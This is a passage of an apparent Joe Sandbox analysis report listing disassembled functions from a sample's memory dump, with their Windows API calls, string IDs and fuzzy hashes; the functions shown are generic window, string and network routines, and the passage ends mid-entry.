                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: Oa
                                          • API String ID: 4104443479-3945284152
                                          • Opcode ID: 49c3ce0204c9ad7e9ca72314e8429a11460f913a0e29da20e13cf13f9b12e0ba
                                          • Instruction ID: 7e6577faf58761c0f3c7fcc15f7156bdfd7164e4f433344e295b0988bf998fcd
                                          • Opcode Fuzzy Hash: 49c3ce0204c9ad7e9ca72314e8429a11460f913a0e29da20e13cf13f9b12e0ba
                                          • Instruction Fuzzy Hash: 805152B0900609DFCB65CF68C584AEEBBF1FF44308F14552AE85AE7350D731A995CB51
                                          Function 00E02AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 00E02AC8
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E02AE1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          • Opcode ID: 8dd046ca93d178506f69f74d25e982b5d5e154a9f1fbc3e6f0df6abb2fee5162
                                          • Instruction ID: ae5985355e3baffc2fb7f385ceedf173a08458cac824149a6e1bdf9de2ecaf4c
                                          • Opcode Fuzzy Hash: 8dd046ca93d178506f69f74d25e982b5d5e154a9f1fbc3e6f0df6abb2fee5162
                                          • Instruction Fuzzy Hash: 98514A728187489BD320AF15DC95BAFBBE8FF84310F42885DF6D9511A1EB308569CB26
                                          Function 00E599BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF506B: __fread_nolock.LIBCMT ref: 00DF5089
                                          • _wcscmp.LIBCMT ref: 00E59AAE
                                          • _wcscmp.LIBCMT ref: 00E59AC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _wcscmp$__fread_nolock
                                          • String ID: FILE
                                          • API String ID: 4029003684-3121273764
                                          • Opcode ID: 54ab0e10da040cb01464b450667d56095f72cf8186f2a914b6749822c0aa3ae7
                                          • Instruction ID: f8861c4d74b02530f8a2e65a65403d581767e09e30710d961b564bed89775ac0
                                          • Opcode Fuzzy Hash: 54ab0e10da040cb01464b450667d56095f72cf8186f2a914b6749822c0aa3ae7
                                          • Instruction Fuzzy Hash: ED41D571A00609BADF209AA0DC46FEFB7F9DF45714F014469FA00B7182DA75AA0487B5
                                          Function 00E3099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID: Dt$Dt
                                          • API String ID: 1473721057-4168040075
                                          • Opcode ID: e1dba87631c21e140f5900624509addf11fca1b382f2202b191cc057ad241c7a
                                          • Instruction ID: 9338c8038f76fe7d34cd294ca080f15933493d6c47ce31628c86b1a5166be44e
                                          • Opcode Fuzzy Hash: e1dba87631c21e140f5900624509addf11fca1b382f2202b191cc057ad241c7a
                                          • Instruction Fuzzy Hash: EB5105B86083458FC754CF19C080A2ABBF1BF98344F55985DEA899B321D731EC85CF62
                                          Function 00E62882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E62892
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E628C8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CrackInternet_memset
                                          • String ID: |
                                          • API String ID: 1413715105-2343686810
                                          • Opcode ID: c338e1734e4a594ae450a9d11d0b06dc1dff32e43225f172fa10ce45d2a33a4f
                                          • Instruction ID: 746724ef97a3193210d3da39e7ca5356ac765c8588d964d50ce8bac8eee9ab8d
                                          • Opcode Fuzzy Hash: c338e1734e4a594ae450a9d11d0b06dc1dff32e43225f172fa10ce45d2a33a4f
                                          • Instruction Fuzzy Hash: 37311871800119AFDF01EFA1DC85EEEBFB9FF08350F104029EA15BA166DA315A56DBB0
                                          Function 00E76CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(?,?,?,?), ref: 00E76D86
                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E76DC2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          • Opcode ID: 7e19f7c431f1254658682df094ab6a67a284574dfc50874b6f1d34a99a5b8d7c
                                          • Instruction ID: b60ca530a9e5c2cb704068783e16e1efee2b770832f2189b2701243c0d745fd2
                                          • Opcode Fuzzy Hash: 7e19f7c431f1254658682df094ab6a67a284574dfc50874b6f1d34a99a5b8d7c
                                          • Instruction Fuzzy Hash: 4B316F71210604AEDB209F64DC40BFB77B9FF48728F10D619FA99A7190DA31AC91CB60
                                          Function 00E52D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E52E00
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E52E3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: 523752f7447882563f398c38946783342c954d22ce7e548bf0edd2ab530c534d
                                          • Instruction ID: 178b2b43b0b3a9a8b1fcfb7541c6fb73d4c3ff2d6750fa795bc124ae4ea0bbac
                                          • Opcode Fuzzy Hash: 523752f7447882563f398c38946783342c954d22ce7e548bf0edd2ab530c534d
                                          • Instruction Fuzzy Hash: D731D731A00305ABEB26CF58D8867DEBBF9EF06355F14186DEE85B61A0DB709D48CB50
                                          Function 00E76943 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E769D0
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E769DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          • Opcode ID: 4563d5dd503d0b2925facc648debbb54d589063d96e61755d8ca3036513448c4
                                          • Instruction ID: a7cee4f8fde9cca5a9326078980c173c1b83a36e6b929ea87be365ba73c4036e
                                          • Opcode Fuzzy Hash: 4563d5dd503d0b2925facc648debbb54d589063d96e61755d8ca3036513448c4
                                          • Instruction Fuzzy Hash: DA11B6716006096FEF119E14CC90EFB376AEB893ACF119125FA5CAB291D7719C5187A0
                                          Function 00E76E76 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DF1D73
                                            • Part of subcall function 00DF1D35: GetStockObject.GDI32(00000011), ref: 00DF1D87
                                            • Part of subcall function 00DF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DF1D91
                                          • GetWindowRect.USER32(00000000,?), ref: 00E76EE0
                                          • GetSysColor.USER32(00000012), ref: 00E76EFA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          • Opcode ID: 318779d99828a46cf812b393deccc462cd0c9e2deb11118216b451723c127d5a
                                          • Instruction ID: 404ca32caa245865f06bae5d86c2de3f0e1a7c2987c998b93b65f1fc1b2ebdf5
                                          • Opcode Fuzzy Hash: 318779d99828a46cf812b393deccc462cd0c9e2deb11118216b451723c127d5a
                                          • Instruction Fuzzy Hash: B5213D72610609AFDB04DFA8DD45AFA7BB8FB08318F049629FD59E3250D734E851DB60
                                          Function 00E76B8F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowTextLengthW.USER32(00000000), ref: 00E76C11
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E76C20
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          • Opcode ID: 5d850316dd7c42efa0f400363bf4954ed3b1d5a91ffe0589903c6fff3612f70c
                                          • Instruction ID: 2af9f51a72b3a51bbd89c4574208bc28c9a3642a86f7b2c5fb124a6bf1d9198f
                                          • Opcode Fuzzy Hash: 5d850316dd7c42efa0f400363bf4954ed3b1d5a91ffe0589903c6fff3612f70c
                                          • Instruction Fuzzy Hash: 9311BC71500608AFEB118E64DC41AFB3769EB0537CF209724F968E31E0C735DC909B60
                                          Function 00E52E9E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00E52F11
                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E52F30
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: dfb10844d766c254dcb276890801780a00e4bb9e01f3ac2cdfa837a048ac27fa
                                          • Instruction ID: 48f3c0408f95d8968bce4b50bd3555db4a7d4935c44e78c6e5208ce99fa6eae4
                                          • Opcode Fuzzy Hash: dfb10844d766c254dcb276890801780a00e4bb9e01f3ac2cdfa837a048ac27fa
                                          • Instruction Fuzzy Hash: 1D11D332E01114ABCB35DB58EC45B9E73B9EB06319F0415A9EE44B72A0DB70AD0C87E1
                                          Function 00E624CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E62520
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E62549
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          • Opcode ID: f3d3a6074ef1d7ee40c7c3c147c8ea9cf39f1412d8313e94afcde163a24d3186
                                          • Instruction ID: c74d995c14e64f812107d6ca2d97071938cef7d62d234fb8dfdf0e246ad54300
                                          • Opcode Fuzzy Hash: f3d3a6074ef1d7ee40c7c3c147c8ea9cf39f1412d8313e94afcde163a24d3186
                                          • Instruction Fuzzy Hash: EE110170180A21BEDB248F119C98EFBFF68FB06395F00912EFA0666040D3706980D6A1
                                          Function 00E680A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E6830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00E680C8,?,00000000,?,?), ref: 00E68322
                                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E680CB
                                          • htons.WSOCK32(00000000,?,00000000), ref: 00E68108
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                          • String ID: 255.255.255.255
                                          • API String ID: 2496851823-2422070025
                                          • Opcode ID: f3fa669f98337aa0627708afedcda31b4c2d96407ea0721e2df2b2c8285fe6f9
                                          • Instruction ID: da4ed9e67bf5739067dd5bce37ed06e38edc47ea3879f2250ac3484a8c4df6e9
                                          • Opcode Fuzzy Hash: f3fa669f98337aa0627708afedcda31b4c2d96407ea0721e2df2b2c8285fe6f9
                                          • Instruction Fuzzy Hash: 1D11E534140209ABDB20AF64ED56FFEB374FF45360F109627EA11B7291DB31A815C751
                                          Function 00E00A8D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00DF3C26,00EB62F8,?,?,?), ref: 00E00ACE
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          • _wcscat.LIBCMT ref: 00E350E1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FullNamePath_memmove_wcscat
                                          • String ID: c
                                          • API String ID: 257928180-921687731
                                          • Opcode ID: eec3dcddde0aa915829be2705320e68130aa6542ee9038697610dcfd85d9c57a
                                          • Instruction ID: c548351e482654ca2effd4ce2d12ba3adf4e9712ecbcb2150e2dd733fa34a07f
                                          • Opcode Fuzzy Hash: eec3dcddde0aa915829be2705320e68130aa6542ee9038697610dcfd85d9c57a
                                          • Instruction Fuzzy Hash: B211697590420C9ACB50EBA4DC02ED977F8EF58354F0150A5FA48F7191DA74DBC48B21
                                          Function 00E492E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E4B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E4B0E7
                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E49355
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: ded136a14de4ea5622c8f4aa3a6359472f66656e916de7197da999decae62185
                                          • Instruction ID: db4e3afaca7a417c0dea1dd9ea797ebe7464b8667157bfed44aa228790eb12b7
                                          • Opcode Fuzzy Hash: ded136a14de4ea5622c8f4aa3a6359472f66656e916de7197da999decae62185
                                          • Instruction Fuzzy Hash: 4101D271A01218AB8B08EFA4DC928FE7369FF06320B141619FA32772D2DB3169088670
                                          Function 00E491DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E4B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E4B0E7
                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E4924D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: b61def09a424792389587f00917436e9700a8c25129fa38389fc1d2623d8391f
                                          • Instruction ID: c3c12a890ac1c41cf88ca74d4bd684ae6d5a6b8a146b6b1f581b8b9ca775c95b
                                          • Opcode Fuzzy Hash: b61def09a424792389587f00917436e9700a8c25129fa38389fc1d2623d8391f
                                          • Instruction Fuzzy Hash: 4C01A771E41208BBCB08EBA4E992DFF73ACDF45300F151019BA1277292EA516F1C96B1
                                          Function 00E49264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00E4B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E4B0E7
                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E492D0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: 41228ff7671f9682f9b6d03763af75e197d0498e00f4346dbecb48c30a1468d4
                                          • Instruction ID: b234ce18046daea05dd5e9bb510d6bc8596b9d8e569bdea1a756afaffaa74b54
